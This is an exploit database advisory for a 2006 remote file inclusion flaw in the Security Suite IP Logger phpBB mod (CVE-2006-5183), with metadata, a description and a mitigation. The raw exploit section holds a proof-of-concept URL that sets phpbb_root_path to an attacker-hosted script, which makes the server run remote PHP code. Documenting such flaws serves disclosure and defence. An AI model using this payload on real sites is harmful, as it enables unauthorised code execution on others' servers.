Security Suite IP Logger Remote File Inclusion Vulnerability

vendor:

Security Suite IP Logger

by:

SpiderZ

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Security Suite IP Logger

Affected Version From: 2.0.x

Affected Version To: 2.0.21

Patch Exists: YES

Related CWE: CVE-2006-5183

CPE: a:phpbb:security_suite_ip_logger

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2006

Security Suite IP Logger Remote File Inclusion Vulnerability

This vulnerability allows remote attackers to execute arbitrary PHP code on vulnerable installations of phpBB. Authentication is not required to exploit this vulnerability. The vulnerability is caused due to the "logger_engine.php" script not properly sanitizing user-supplied input to the "phpbb_root_path" parameter. This can be exploited to include arbitrary local or remote PHP files.

Mitigation:

Upgrade to the latest version of Security Suite IP Logger.

Source

Exploit-DB raw data:

           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion - Security Suite IP Logger



http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]



-------------------------------------------------------------------------

# Download: http://www.phpbb.de/viewtopic.php?t=30261

# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip

-------------------------------------------------------------------------

# milw0rm.com [2006-10-05]